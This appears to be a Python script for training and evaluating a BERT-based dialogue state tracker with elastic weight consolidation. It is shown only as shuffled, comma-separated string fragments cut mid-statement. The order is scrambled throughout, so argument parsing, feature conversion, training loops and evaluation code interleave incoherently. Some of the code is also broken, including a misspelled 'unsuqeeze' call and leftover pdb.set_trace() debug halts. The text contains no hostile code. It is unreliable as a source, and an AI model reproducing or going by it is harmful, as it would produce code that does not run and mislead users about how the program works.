all_input_len, all_label_ids, all_prev_label_ids) if", "data.\"\"\" def __init__(self, input_ids, input_len, label_id, prev_label_id): self.input_ids = input_ids self.input_len = input_len", "\" # \" + text_b else: text_a = line[2] # line[2]: user utterance", "(ex_index, example) in enumerate(examples): if max_turn < int(example.guid.split('-')[2]): max_turn = int(example.guid.split('-')[2]) max_turn_length =", "## Get slot-type embeddings ## Note: slot embeddings are ordered as [previous slots", "loss_slot, acc, acc_slot, nb_eval_ex): eval_loss += loss.item() * nb_eval_ex eval_accuracy += acc.item() *", "#if (len(incorrect_dialogs) < attention_draw): max_len = input_ids.size(2) attn_scores = model.attn.get_scores().transpose(1, 2).contiguous().view(label_ids.size(1)*nslot, -1, max_len)", "type=float, help=\"The number of epochs to allow no further improvement.\") parser.add_argument(\"--warmup_proportion\", default=0.1, type=float,", "self.label = label # Target slots in this training task self.prev_label = prev_label", "\"ontology_dstc2_en.json\"), \"r\") ontology = json.load(fp_ontology) ontology = ontology[\"informable\"] del ontology[\"request\"] for slot in", "test set.\") parser.add_argument(\"--do_lower_case\", action='store_true', help=\"Set this flag if you are using an uncased", "* loss_ewc else: loss_, _, acc, acc_slot, _ = model(input_ids, input_len, label_ids, n_gpu,", "in sorted(result.keys()): logger.info(\" %s = %s\", key, str(result[key])) writer.write(\"%s = %s\\n\" % (key,", "eval_sampler = SequentialSampler(eval_data) eval_dataloader = DataLoader(eval_data, sampler=eval_sampler, batch_size=1) model.eval() none_value_id = [ len(val)-1", "features += [InputFeatures(input_ids=all_padding, input_len=all_padding_len, label_id=[-1]*slot_dim, prev_label_id=[-1]*prev_slot_dim)] * (max_turn_length - prev_turn_idx - 1) assert", "else: loss.backward() if summary_writer is not None: summary_writer.add_scalar(\"Epoch\", epoch, global_step) summary_writer.add_scalar(\"Train/Loss\", loss_, global_step)", "action='store_true', help=\"Do not train BERT utterance encoder\") ## Other parameters parser.add_argument(\"--max_seq_length\", default=64, type=int,", "{'params': [p for n, p in param_optimizer if not any(nd in n for", "all_label_ids = all_input_ids.to(device), all_input_len.to( device), all_label_ids.to(device) logger.info(\"***** Running analysis *****\") logger.info(\" Num examples", "default=False, help=\"skip-connection\") parser.add_argument('--attn_head', type=int, default=4, help=\"the number of heads in multi-headed attention\") parser.add_argument(\"--do_train\",", "summary_writer = None fileHandler = logging.FileHandler(os.path.join(args.output_dir, \"%s.txt\"%(tb_file_name))) logger.addHandler(fileHandler) logger.info(args) # CUDA setting if", "= 5 for input_ids, input_len, label_ids in tqdm(eval_dataloader, desc=\"Evaluating\"): if input_ids.dim() == 2:", "desc=\"Validation\")): batch = tuple(t.to(device) for t in batch) input_ids, input_len, label_ids, prev_label_ids =", "Running evaluation *****\") logger.info(\" Num examples = %d\", len(eval_examples)) logger.info(\" Batch size =", "# Main ############################################################################### def main(): parser = argparse.ArgumentParser() ## Required parameters parser.add_argument('--data_dir', type=str,", "= 1 # Initializes the distributed backend which will take care of sychronizing", "as f: reader = csv.reader(f, delimiter=\"\\t\", quotechar=quotechar) lines = [] for line in", "size = %d\", args.train_batch_size) logger.info(\" Num steps = %d\", num_train_steps) all_input_ids, all_input_len, all_label_ids,", "= json.load(fp_ontology) ontology = ontology[\"informable\"] del ontology[\"request\"] for slot in ontology.keys(): ontology[slot].append(\"do not", "DistributedSampler(train_data) train_dataloader = DataLoader(train_data, sampler=train_sampler, batch_size=args.train_batch_size) ## Dev ## utterances all_input_ids_dev, all_input_len_dev, all_label_ids_dev,", "str(val/ nb_eval_examples) for val in eval_loss_slot]), 'eval_acc_slot':'\\t'.join([ str((val).item()) for val in eval_acc_slot]), 'prev_eval_loss':", "label encoder trainable. \\n\" \"This option is valid only when using label embeddings.", "for i, _label in enumerate(labels)} for labels in label_list] for i, label in", "assert len(label_token_ids) == max_seq_length features.append((label_token_ids, label_len)) all_label_token_ids = torch.tensor([f[0] for f in features],", "= torch.load(output_model_file, map_location=device) del_list = [] for key in ptr_model.keys(): if ('slot' in", "text['label'] = [str(label_list[idx][x]) for idx, x in enumerate(label.cpu().numpy())] text['pred'] = [str(label_list[idx][x]) for idx,", "enumerate(loss_slot): eval_loss_slot[i] = eval_loss_slot[i] + l * nb_eval_ex if eval_acc_slot is None: eval_acc_slot", "prev_loss, prev_loss_slot, prev_acc, prev_acc_slot, _ = model(input_ids, input_len, prev_label_ids, n_gpu, target_slot=prev_slot_id) else: loss_,", "prev_dev_loss, global_step) summary_writer.add_scalar(\"Validate/Prev_Acc\", prev_dev_acc, global_step) if n_gpu == 1: for i, slot in", "writer.write(\"---------- \\n\") logger.info(\"Done analysis: %s\" % output_eval_incorr_file) output_eval_incorr_file = os.path.join(args.output_dir, \"per_class_accuracy.txt\") with open(output_eval_incorr_file,", "= model.module state = model.state_dict() state.update(ptr_model) model.load_state_dict(state) model.to(device) ## Get slot-value embeddings label_token_ids,", "are ordered as [previous slots + present target slots] slot_token_ids, slot_len = \\", "or prev_turn_idx < max_turn_length: features.append(InputFeatures(input_ids=input_ids, input_len=input_len, label_id=label_id, prev_label_id=prev_label_id, )) prev_dialogue_idx = curr_dialogue_idx prev_turn_idx", "Model Updated: Epoch=%d, Validation Loss=%.6f, Validation Acc=%.6f ***\" % (last_update, best_loss, best_acc)) else:", "= model(input_ids, input_len, label_ids, 1) nturn = (label_ids[:,:,0].view(-1) != -1).sum().item() nslot = label_ids.size(2)", "\\n\" \"than this will be padded.\") parser.add_argument(\"--max_turn_length\", default=22, type=int, help=\"The maximum total input", "* prev_slot_dim)] * (max_turn_length - prev_turn_idx - 1) assert len(features) % max_turn_length ==", "present task # tokenizer vocab_dir = os.path.join(args.bert_dir, '%s-vocab.txt' % args.bert_model) if not os.path.exists(vocab_dir):", "total_slot_class_acc = [] nlabels = 0 for sid, slot in enumerate(class_count): slot_class_acc =", "args.no_cuda: device = torch.device(\"cuda\" if torch.cuda.is_available() and not args.no_cuda else \"cpu\") n_gpu =", "import random import collections import operator from tqdm import tqdm, trange import numpy", "parser.add_argument(\"--max_turn_length\", default=22, type=int, help=\"The maximum total input turn length. \\n\" \"Sequences longer than", "0, 0 prev_dev_loss = 0 prev_dev_acc = 0 prev_dev_loss_slot, prev_dev_acc_slot = None, None", "= eval_acc_slot / nb_eval_examples prev_eval_acc_slot = prev_eval_acc_slot / nb_eval_examples_prev total_acc_slot = {} for", "None: eval_loss_slot = [ l * nb_eval_ex for l in loss_slot] else: for", "prev_eval_accuracy = 0, 0 prev_eval_loss_slot, prev_eval_acc_slot = None, None nb_eval_examples_prev = 0 for", "parser.add_argument(\"--warmup_proportion\", default=0.1, type=float, help=\"Proportion of training to perform linear learning rate warmup for.", "+ [\"[SEP]\"] input_len[1] = len(tokens_b) + 1 input_ids = tokenizer.convert_tokens_to_ids(tokens) # Zero-pad up", "+ args.lambda_ewc * loss_ewc if args.gradient_accumulation_steps > 1: loss = loss / args.gradient_accumulation_steps", "\"w\") as writer: logger.info(\"***** Eval results *****\") for key in sorted(result.keys()): logger.info(\" %s", "return label_id, label_info features = [] prev_dialogue_idx = None all_padding = [0] *", "matplotlib.pyplot as plt import seaborn seaborn.set_context(context=\"talk\") logging.basicConfig(format='%(asctime)s - %(levelname)s - %(name)s - %(message)s',", "features = [] for label in labels: label_tokens = [\"[CLS]\"] + tokenizer.tokenize(label) +", "parser.add_argument(\"--bert_model\", default=None, type=str, required=True, help=\"Bert pre-trained model selected in the list: bert-base-uncased, \"", "parser.add_argument(\"--local_rank\", type=int, default=-1, help=\"local_rank for distributed training on gpus\") parser.add_argument('--seed', type=int, default=42, help=\"random", "class InputFeatures(object): \"\"\"A single set of features of data.\"\"\" def __init__(self, input_ids, input_len,", "for. \" \"E.g., 0.1 = 10%% of training.\") parser.add_argument(\"--lambda_ewc\", default=0.1, type=float, help=\"Hyper-parameter for", "label_len.append(lens) ## Get slot-type embeddings ## Note: slot embeddings are ordered as [previous", "\" # \" + text_a text_b = line[3] + \" # \" +", "prev_label_ids, n_gpu, target_slot=prev_slot_id) prev_loss = prev_loss.mean() prev_acc = prev_acc.mean() prev_acc_slot = prev_acc_slot.mean(0) num_valid_turn", "help=\"The maximum total input turn length. \\n\" \"Sequences longer than this will be", "tokenizer, device) model.initialize_slot_value_lookup(label_token_ids, label_len, slot_token_ids, slot_len) if args.local_rank != -1: try: from apex.parallel", "prev_label_ids, n_gpu, target_slot=prev_slot_id) else: loss, loss_slot, acc, acc_slot, _ = model(input_ids, input_len, label_ids,", "for sid, slot_acc in enumerate(total_slot_class_acc): writer.write(\"%d\\t%.3f\\n\" % (sid, slot_acc)) writer.write(\"total class accuracy \\t%.3f\\n\"", "!= curr_dialogue_idx): if prev_turn_idx < max_turn_length: features += [InputFeatures(input_ids=all_padding, input_len=all_padding_len, label_id=[-1]*slot_dim, prev_label_id=[-1] *", "of labels of all slots #prev_slot_id = processor.prev_slot_idx #target_slot_id = processor.target_slot_idx # wrong", "args.fp16: model.half() # Load pretrained model # in the case that slot and", "for key in ptr_model.keys(): if ('slot' in key) or ('value' in key): del_list.append(key)", "def __init__(self, input_ids, input_len, label_id, prev_label_id): self.input_ids = input_ids self.input_len = input_len self.label_id", "> 100 and last_update + args.patience <= epoch: if last_update + args.patience <=", "= ' '.join(tokenizer.convert_ids_to_tokens(input.cpu().numpy())).replace(' [PAD]', '') text['label'] = [str(label_list[idx][x]) for idx, x in enumerate(label.cpu().numpy())]", "train set.\"\"\" raise NotImplementedError() def get_dev_examples(self, data_dir): \"\"\"Gets a collection of `InputExample`s for", "max_turn_length: features += [InputFeatures(input_ids=all_padding, input_len=all_padding_len, label_id=[-1]*slot_dim, prev_label_id=[-1]*prev_slot_dim)] * (max_turn_length - prev_turn_idx - 1)", "epoch in trange(int(args.num_train_epochs), desc=\"Epoch\"): # for epoch in trange(1): #### TRAIN model.train() tr_loss", "x in tokenizer.tokenize(example.text_a)] tokens_b = None if example.text_b: tokens_b = [x if x", "prev_loss_slot] prev_dev_acc_slot = prev_acc_slot * prev_num_valid_turn else: for i, l in enumerate(loss_slot): dev_loss_slot[i]", "= line[3] prev_dialogue_index = line[0] else: # The symbol '#' will be replaced", "help=\"Whether not to use CUDA when available\") parser.add_argument(\"--local_rank\", type=int, default=-1, help=\"local_rank for distributed", "\"ontology.json\"), \"r\") ontology = json.load(fp_ontology) for slot in ontology.keys(): ontology[slot].append(\"none\") fp_ontology.close() if not", "if args.gradient_accumulation_steps > 1: loss = loss / args.gradient_accumulation_steps if args.fp16: optimizer.backward(loss) else:", "%s\" % output_eval_incorr_file) output_eval_incorr_file = os.path.join(args.output_dir, \"per_class_accuracy.txt\") with open(output_eval_incorr_file, \"w\") as writer: total_class_acc", "none_value_id = [ len(val)-1 for val in label_list] incorrect_dialogs = [] attention_draw =", "all_label_ids, all_prev_label_ids \\ = all_input_ids.to(device), all_input_len.to(device), all_label_ids.to(device), all_prev_label_ids.to(device) logger.info(\"***** Running evaluation *****\") logger.info(\"", "in eval_loss_slot]), 'eval_acc_slot':'\\t'.join([ str((val).item()) for val in eval_acc_slot]), 'prev_eval_loss': prev_eval_loss, 'prev_eval_accuracy': prev_eval_accuracy, 'prev_eval_loss_slot':", "examples = %d\", len(eval_examples)) logger.info(\" Batch size = %d\", 1) eval_data = TensorDataset(all_input_ids,", "csv.reader(f, delimiter=\"\\t\", quotechar=quotechar) lines = [] for line in reader: if len(line) >", "model selected in the list: bert-base-uncased, \" \"bert-large-uncased, bert-base-cased, bert-large-cased, bert-base-multilingual-uncased, \" \"bert-base-multilingual-cased,", "model = torch.nn.DataParallel(model) # Prepare optimizer if args.do_train: def get_optimizer_grouped_parameters(model): param_optimizer = [(n,", "the test set.\") parser.add_argument(\"--do_lower_case\", action='store_true', help=\"Set this flag if you are using an", "features.append(InputFeatures(input_ids=input_ids, input_len=input_len, label_id=label_id, prev_label_id=prev_label_id, )) prev_dialogue_idx = curr_dialogue_idx prev_turn_idx = curr_turn_idx if prev_turn_idx", "summary_writer.add_scalar(\"Validate/Prev_Loss_%s\" % slot.replace(' ','_'), prev_dev_loss_slot[i]/prev_nb_dev_examples, global_step) summary_writer.add_scalar(\"Validate/Prev_Acc_%s\" % slot.replace(' ','_'), prev_dev_acc_slot[i], global_step) logger.info(\"***", "'LayerNorm.weight'] optimizer_grouped_parameters = [ {'params': [p for n, p in param_optimizer if not", "sid, slot_acc in enumerate(total_slot_class_acc): writer.write(\"%d\\t%.3f\\n\" % (sid, slot_acc)) writer.write(\"total class accuracy \\t%.3f\\n\" %", "summary_writer.add_scalar(\"Train/JointAcc\", acc, global_step) if n_gpu == 1: for i, slot in enumerate(processor.target_slot): summary_writer.add_scalar(\"Train/Loss_%s\"", "place to the maximum length.\"\"\" while True: total_length = len(tokens_a) + len(tokens_b) if", "if args.local_rank == -1: train_sampler = RandomSampler(train_data) else: train_sampler = DistributedSampler(train_data) train_dataloader =", "eval_loss_slot, eval_accuracy, eval_acc_slot, loss, loss_slot, acc, acc_slot, nb_eval_ex): eval_loss += loss.item() * nb_eval_ex", "for full data eval_sampler = SequentialSampler(eval_data) eval_dataloader = DataLoader(eval_data, sampler=eval_sampler, batch_size=1) model.eval() none_value_id", "Analyze: TODO ############################################################################### if args.do_analyze and (args.local_rank == -1 or torch.distributed.get_rank() == 0):", "'total_acc_slot': '\\t'.join([str(val[1].item()) for val in total_acc_slot]) } out_file_name = 'eval_results' if args.target_slot=='all': out_file_name", "all_label_len = torch.tensor([f[1] for f in features], dtype=torch.long).to(device) return all_label_token_ids, all_label_len def _truncate_seq_pair(tokens_a,", "str(result[key])) writer.write(\"%s = %s\\n\" % (key, str(result[key]))) ############################################################################### # Analyze: TODO ############################################################################### if", "previous slots: ' + ', '.join(self.prev_slot)) logger.info('Processor: target slots: '+ ', '.join(self.target_slot)) def", "for EWC\") parser.add_argument(\"--no_cuda\", action='store_true', help=\"Whether not to use CUDA when available\") parser.add_argument(\"--local_rank\", type=int,", "\"incorrect_dialog.txt\") with open(output_eval_incorr_file, \"w\") as writer: for dialog in incorrect_dialogs: for turn in", "= [] label_info = '' label_map = [{_label: i for i, _label in", "to set the label encoder trainable. \\n\" \"This option is valid only when", "get_labels(self): \"\"\"Gets the list of labels for this data set.\"\"\" raise NotImplementedError() @classmethod", "0:10, 8:18].cpu() == torch.Tensor(none_value_id[8:18]).long().repeat(10, 1)) print(pred_slot[0, 0:10, 8:18].cpu() == torch.Tensor(none_value_id[8:18]).long().repeat(10, 1)) print(label_ids[0, 0:10,", "# List of slots in previous task target_slot_id = list(range(len(processor.prev_slot), len(processor.all_slot))) # list", "prev_acc = prev_acc.mean() prev_acc_slot = prev_acc_slot.mean(0) nb_eval_ex_prev = (prev_label_ids[:,:,0].view(-1) != -1).sum().item() nb_eval_examples_prev +=", "embeddings. \\n\") parser.add_argument(\"--distance_metric\", type=str, default=\"cosine\", help=\"The metric for distance between label embeddings: cosine,", "torch.nn.DataParallel(model) # Prepare optimizer if args.do_train: def get_optimizer_grouped_parameters(model): param_optimizer = [(n, p) for", "prev_eval_loss, prev_eval_loss_slot, prev_eval_accuracy, prev_eval_acc_slot = \\ _post_process(prev_eval_loss, prev_eval_loss_slot, prev_eval_accuracy, prev_eval_acc_slot, \\ prev_loss, prev_loss_slot,", "convert_examples_to_features( train_examples, target_label_list, prev_label_list, args.max_seq_length, tokenizer, args.max_turn_length) logger.info(\"***** Running training *****\") logger.info(\" Num", "# sorting the ontology according to the alphabetic order of the slots self.ontology", "set.\") parser.add_argument(\"--do_lower_case\", action='store_true', help=\"Set this flag if you are using an uncased model.\")", "%d\", args.train_batch_size) logger.info(\" Num steps = %d\", num_train_steps) all_input_ids, all_input_len, all_label_ids, all_prev_label_ids \\", "prev_slot_id = list(range(0, len(processor.prev_slot))) # List of slots in previous task target_slot_id =", "distributed and fp16 training.\") model = DDP(model) elif n_gpu > 1: model =", "nb_eval_examples_prev prev_eval_accuracy = prev_eval_accuracy / nb_eval_examples_prev eval_acc_slot = eval_acc_slot / nb_eval_examples prev_eval_acc_slot =", "Zero-pad up to the sequence length. input_ids += [0] * (max_seq_length - len(input_ids))", "'prev_eval_loss': prev_eval_loss, 'prev_eval_accuracy': prev_eval_accuracy, 'prev_eval_loss_slot': '\\t'.join([str(val / nb_eval_examples_prev) for val in prev_eval_loss_slot]), 'prev_eval_acc_slot':", "args.nbt =='rnn': from BeliefTrackerSlotQueryMultiSlot import BeliefTracker if args.task_name.find(\"gru\") == -1 and args.task_name.find(\"lstm\") ==", "parser.add_argument('--skip_connect', type=str, default=False, help=\"skip-connection\") parser.add_argument('--attn_head', type=int, default=4, help=\"the number of heads in multi-headed", "is None: dev_loss_slot = [ l * num_valid_turn for l in loss_slot] dev_acc_slot", "\"\"\"A single set of features of data.\"\"\" def __init__(self, input_ids, input_len, label_id, prev_label_id):", "prev_num_valid_turn nb_dev_examples += num_valid_turn prev_nb_dev_examples += prev_num_valid_turn dev_loss = dev_loss / nb_dev_examples dev_acc", "prev_acc_slot = prev_acc_slot.mean(0) num_valid_turn = torch.sum(label_ids[:,:,0].view(-1) > -1, 0).item() dev_loss += loss.item() *", "n_gpu, target_slot=target_slot_id) prev_loss, prev_loss_slot, prev_acc, prev_acc_slot, _ = model(input_ids, input_len, prev_label_ids, n_gpu, target_slot=prev_slot_id)", "logging.FileHandler(os.path.join(args.output_dir, \"%s.txt\"%(tb_file_name))) logger.addHandler(fileHandler) logger.info(args) # CUDA setting if args.local_rank == -1 or args.no_cuda:", "label_map = [{_label: i for i, _label in enumerate(labels)} for labels in label_list]", "== torch.Tensor(none_value_id[18:]).long().repeat(10, 1)) pdb.set_trace() if drawfig == True: #if (len(incorrect_dialogs) < attention_draw): max_len", "args.gradient_accumulation_steps) # Set the random seed manually for reproducibility. random.seed(args.seed) np.random.seed(args.seed) torch.manual_seed(args.seed) if", "- prev_turn_idx - 1) assert len(features) % max_turn_length == 0 all_input_ids = torch.tensor([f.input_ids", "* nb_eval_ex else: eval_acc_slot += acc_slot * nb_eval_ex return eval_loss, eval_loss_slot, eval_accuracy, eval_acc_slot", "[p for n, p in param_optimizer if any(nd in n for nd in", "be truncated, and sequences shorter \\n\" \"than this will be padded.\") parser.add_argument('--hidden_dim', type=int,", "seaborn.set_context(context=\"talk\") logging.basicConfig(format='%(asctime)s - %(levelname)s - %(name)s - %(message)s', datefmt='%m/%d/%Y %H:%M:%S', level=logging.INFO) logger =", "label_list: token_ids, lens = get_label_embedding(labels, args.max_label_length, tokenizer, device) label_token_ids.append(token_ids) label_len.append(lens) ## Get slot-type", "nb_eval_ex eval_accuracy += acc.item() * nb_eval_ex if loss_slot is not None: if eval_loss_slot", "type=int, help=\"Total batch size for validation.\") parser.add_argument(\"--eval_batch_size\", default=16, type=int, help=\"Total batch size for", "prev_acc.item() * prev_num_valid_turn if n_gpu == 1: if dev_loss_slot is None: dev_loss_slot =", "= input_ids.size(2) attn_scores = model.attn.get_scores().transpose(1, 2).contiguous().view(label_ids.size(1)*nslot, -1, max_len) for slot in range(0, nslot):", "[str(label_list[idx][x]) for idx, x in enumerate(label.cpu().numpy())] text['pred'] = [str(label_list[idx][x]) for idx, x in", "not config.target_slot == 'all': slot_idx = {'attraction':'0:1:2', 'bus':'3:4:5:6', 'hospital':'7', 'hotel':'8:9:10:11:12:13:14:15:16:17',\\ 'restaurant':'18:19:20:21:22:23:24', 'taxi':'25:26:27:28', 'train':'29:30:31:32:33:34'}", "= label_ids.unsuqeeze(0) prev_label_ids = prev_label_ids.unsuqeeze(0) with torch.no_grad(): if n_gpu == 1: loss, loss_slot,", "bert-base-cased, bert-large-cased, bert-base-multilingual-uncased, \" \"bert-base-multilingual-cased, bert-base-chinese.\") parser.add_argument(\"--bert_dir\", default='/gfs/nlp/.pytorch_pretrained_bert', type=str, required=False, help=\"The directory of", "1 # Initializes the distributed backend which will take care of sychronizing nodes/GPUs", "logger.addHandler(fileHandler) logger.info(args) # CUDA setting if args.local_rank == -1 or args.no_cuda: device =", "in label_list] incorrect_dialogs = [] attention_draw = 5 for input_ids, input_len, label_ids in", "args.max_label_length, tokenizer, device) label_token_ids.append(token_ids) label_len.append(lens) ## Get slot-type embeddings ## Note: slot embeddings", "* num_valid_turn dev_acc += acc.item() * num_valid_turn prev_num_valid_turn = torch.sum(prev_label_ids[:,:,0].view(-1) > -1, 0).item()", "required=False, help=\"The directory of the pretrained BERT model\") parser.add_argument(\"--task_name\", default=None, type=str, required=True, help=\"The", "else: for i, l in enumerate(loss_slot): eval_loss_slot[i] = eval_loss_slot[i] + l * nb_eval_ex", "return lines class Processor(DataProcessor): \"\"\"Processor for the belief tracking dataset (GLUE version).\"\"\" def", "os.path.join(args.output_dir, \"per_class_accuracy.txt\") with open(output_eval_incorr_file, \"w\") as writer: total_class_acc = 0 total_slot_class_acc = []", "for idx in self.prev_slot_idx] examples.append( InputExample(guid=guid, text_a=text_a, text_b=text_b, label=label, prev_label=prev_label)) return examples def", "_truncate_seq_pair(tokens_a, tokens_b, max_length): \"\"\"Truncates a sequence pair in place to the maximum length.\"\"\"", "model.\") parser.add_argument(\"--set_label_encoder_trainable\", action='store_true', help=\"Set this flag if you want to set the label", "nb_dev_steps = 0, 0 prev_dev_loss = 0 prev_dev_acc = 0 prev_dev_loss_slot, prev_dev_acc_slot =", "dev_acc_slot = acc_slot * num_valid_turn prev_dev_loss_slot = [ l * prev_num_valid_turn for l", "tokenizer, args.max_turn_length) all_input_ids, all_input_len, all_label_ids, all_prev_label_ids \\ = all_input_ids.to(device), all_input_len.to(device), all_label_ids.to(device), all_prev_label_ids.to(device) logger.info(\"*****", "_ = model(input_ids, input_len, label_ids, n_gpu, target_slot=target_slot_id) loss = loss.mean() acc = acc.mean()", "[*range(0, args.attn_head)], ax=axs[turn]) axs[turn].set_title(\"turn %d slot: %s label: %s pred: %s\" % (turn,", "args.train_batch_size * args.num_train_epochs) num_dev_steps = int(len(dev_examples) / args.dev_batch_size * args.num_train_epochs) ## utterances all_input_ids,", "parser.add_argument('--gradient_accumulation_steps', type=int, default=1, help=\"Number of updates steps to accumulate before performing a backward/update", "= torch.device(\"cuda\", args.local_rank) n_gpu = 1 # Initializes the distributed backend which will", "train_sampler = DistributedSampler(train_data) train_dataloader = DataLoader(train_data, sampler=train_sampler, batch_size=args.train_batch_size) ## Dev ## utterances all_input_ids_dev,", "accumulation) def get_dev_examples(self, data_dir, accumulation=False): \"\"\"See base class.\"\"\" return self._create_examples( self._read_tsv(os.path.join(data_dir, \"dev.tsv\")), \"dev\",", "are using an uncased model.\") parser.add_argument(\"--set_label_encoder_trainable\", action='store_true', help=\"Set this flag if you want", "0: torch.cuda.manual_seed_all(args.seed) if not args.do_train and not args.do_eval and not args.do_analyze: raise ValueError(\"At", "'transformer': from BeliefTrackerSlotQueryMultiSlotTransformer import BeliefTracker from BeliefTrackerSlotQueryMultiSlotEWC import EWC else: raise ValueError('nbt type", "eval_loss, 'eval_accuracy': eval_accuracy, 'loss': loss, 'eval_loss_slot':'\\t'.join([ str(val/ nb_eval_examples) for val in eval_loss_slot]), 'eval_acc_slot':'\\t'.join([", "return 1.0 - x ############################################################################### # Main ############################################################################### def main(): parser = argparse.ArgumentParser()", "class_count[slot][label_ids[0][turn][slot]]+=1 if label_ids[0][turn][slot] == pred_slot[0][turn][slot]: class_correct[slot][label_ids[0][turn][slot]] +=1 drawfig = False print('hotel') print(label_ids[0, 0:10,", "model.train() tr_loss = 0 nb_tr_examples, nb_tr_steps = 0, 0 for step, batch in", "l in enumerate(prev_loss_slot): prev_dev_loss_slot[i] = prev_dev_loss_slot[i] + l * prev_num_valid_turn prev_dev_acc_slot += prev_acc_slot", "parser.add_argument(\"--lambda_ewc\", default=0.1, type=float, help=\"Hyper-parameter for EWC\") parser.add_argument(\"--no_cuda\", action='store_true', help=\"Whether not to use CUDA", "NotImplementedError() # sorting the ontology according to the alphabetic order of the slots", "-> nbt, rename_list.append(key) for key in del_list: del ptr_model[key] for key in rename_list:", "self.ontology[slot] for slot in self.target_slot] def get_prev_labels(self): \"\"\"See base class.\"\"\" return [ self.ontology[slot]", "directory of the pretrained BERT model\") parser.add_argument(\"--task_name\", default=None, type=str, required=True, help=\"The name of", "eval_loss_slot[i] + l * nb_eval_ex if eval_acc_slot is None: eval_acc_slot = acc_slot *", "= text_b self.label = label # Target slots in this training task self.prev_label", "for step, batch in enumerate(tqdm(train_dataloader, desc=\"Iteration\")): batch = tuple(t.to(device) for t in batch)", "out_file_name += '_all' output_eval_file = os.path.join(args.output_dir, \"%s.txt\" % out_file_name) with open(output_eval_file, \"w\") as", "== -1 or torch.distributed.get_rank() == 0): pdb.set_trace() def draw(data, x, y, ax): seaborn.heatmap(data,", "'_all' output_eval_file = os.path.join(args.output_dir, \"%s.txt\" % out_file_name) with open(output_eval_file, \"w\") as writer: logger.info(\"*****", ")) plt.show() plt.savefig(os.path.join(args.output_dir, \"attention-d%d-slot%s.png\"%(len(incorrect_dialogs), slot))) plt.close() if not acc == 1: dialog =", "rnn -> nbt, rename_list.append(key) for key in del_list: del ptr_model[key] for key in", "import numpy as np import torch from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler", "label = _hard_coding_label(label) label_id.append(label_map[i][label]) label_info += '%s (id = %d) ' % (label,", "/ args.dev_batch_size * args.num_train_epochs) ## utterances all_input_ids, all_input_len, all_label_ids, all_prev_label_ids = convert_examples_to_features( train_examples,", "tokenizer vocab_dir = os.path.join(args.bert_dir, '%s-vocab.txt' % args.bert_model) if not os.path.exists(vocab_dir): raise ValueError(\"Can't find", "perform.\") parser.add_argument(\"--patience\", default=10.0, type=float, help=\"The number of epochs to allow no further improvement.\")", "= 0 for input_ids, input_len, label_ids, prev_label_ids in tqdm(eval_dataloader, desc=\"Evaluating\"): if input_ids.dim() ==", "raise ValueError(\"Invalid gradient_accumulation_steps parameter: {}, should be >= 1\".format( args.gradient_accumulation_steps)) args.train_batch_size = int(args.train_batch_size", "help=\"Whether to run eval on the test set.\") args = parser.parse_args() if os.path.exists(args.output_dir)", "slot_len = \\ get_label_embedding(processor.all_slot, args.max_label_length, tokenizer, device) model.initialize_slot_value_lookup(label_token_ids, label_len, slot_token_ids, slot_len) if n_gpu", "and sequences shorter \\n\" \"than this will be padded.\") parser.add_argument('--hidden_dim', type=int, default=100, help=\"hidden", "default=1, help=\"number of RNN layers\") parser.add_argument('--zero_init_rnn', action='store_true', help=\"set initial hidden of rnns zero\")", "if ('rnn.' in key): # rename rnn -> nbt, rename_list.append(key) for key in", "of `InputExample`s for the dev set.\"\"\" raise NotImplementedError() def get_labels(self): \"\"\"Gets the list", "dev_loss_slot[i]/nb_dev_examples, global_step) summary_writer.add_scalar(\"Validate/Acc_%s\" % slot.replace(' ','_'), dev_acc_slot[i], global_step) for i, slot in enumerate(processor.prev_slot):", "the pretrained BERT model\") parser.add_argument(\"--task_name\", default=None, type=str, required=True, help=\"The name of the task", "if n_gpu > 1: model = model.module state = model.state_dict() state.update(ptr_model) model.load_state_dict(state) model.to(device)", "= SequentialSampler(eval_data) eval_dataloader = DataLoader(eval_data, sampler=eval_sampler, batch_size=1) model.eval() none_value_id = [ len(val)-1 for", "num_train_steps = None accumulation = False if args.do_train: train_examples = processor.get_train_examples(args.data_dir, accumulation=accumulation) dev_examples", "def get_prev_labels(self): \"\"\"See base class.\"\"\" return [ self.ontology[slot] for slot in self.prev_slot] def", "except ImportError: raise ImportError( \"Please install apex from https://www.github.com/nvidia/apex to use distributed and", "prev_dev_acc_slot = prev_acc_slot * prev_num_valid_turn else: for i, l in enumerate(loss_slot): dev_loss_slot[i] =", "round(dev_loss, 6) if last_update is None or dev_loss < best_loss: # Save a", "None or dev_loss < best_loss: # Save a trained model output_model_file = os.path.join(args.output_dir,", "[0] * (max_seq_length - len(label_token_ids)) label_token_ids += label_padding assert len(label_token_ids) == max_seq_length features.append((label_token_ids,", "Batch size = %d\", 1) eval_data = TensorDataset(all_input_ids, all_input_len, all_label_ids) # Run prediction", "will be written.\") parser.add_argument('--load_path', type=str, default='', help='pretrained model directory name') parser.add_argument(\"--target_slot\", default='', type=str,", "n, p in param_optimizer if not any(nd in n for nd in no_decay)],", "None fileHandler = logging.FileHandler(os.path.join(args.output_dir, \"%s.txt\"%(tb_file_name))) logger.addHandler(fileHandler) logger.info(args) # CUDA setting if args.local_rank ==", "if args.gradient_accumulation_steps < 1: raise ValueError(\"Invalid gradient_accumulation_steps parameter: {}, should be >= 1\".format(", "FP16_Optimizer(optimizer, dynamic_loss_scale=True) else: optimizer = FP16_Optimizer(optimizer, static_loss_scale=args.loss_scale) else: optimizer = BertAdam(optimizer_grouped_parameters, lr=args.learning_rate, warmup=args.warmup_proportion,", "prev_loss.mean() prev_acc = prev_acc.mean() prev_acc_slot = prev_acc_slot.mean(0) nb_eval_ex_prev = (prev_label_ids[:,:,0].view(-1) != -1).sum().item() nb_eval_examples_prev", "up BERT uses lr_this_step = args.learning_rate * warmup_linear(global_step / t_total, args.warmup_proportion) if summary_writer", "prev_eval_accuracy = prev_eval_accuracy / nb_eval_examples_prev eval_acc_slot = eval_acc_slot / nb_eval_examples prev_eval_acc_slot = prev_eval_acc_slot", "def draw(data, x, y, ax): seaborn.heatmap(data, xticklabels=x, square=True, yticklabels=y, vmin=0.0, vmax=1.0, cbar=False, ax=ax)", "get_train_examples(self, data_dir): \"\"\"Gets a collection of `InputExample`s for the train set.\"\"\" raise NotImplementedError()", "prev_slot_dim = len(prev_label_list) def _hard_coding_label(label): return 'do not care' if label=='dontcare' else label", "nb_eval_examples if eval_loss_slot is None: # for multi-gpu eval_loss_slot = [0] prev_eval_loss_slot =", "idx in self.target_slot_idx: self.target_slot.append(slot) elif idx in self.prev_slot_idx: self.prev_slot.append(slot) self.all_slot = self.prev_slot +", "all_prev_label_ids 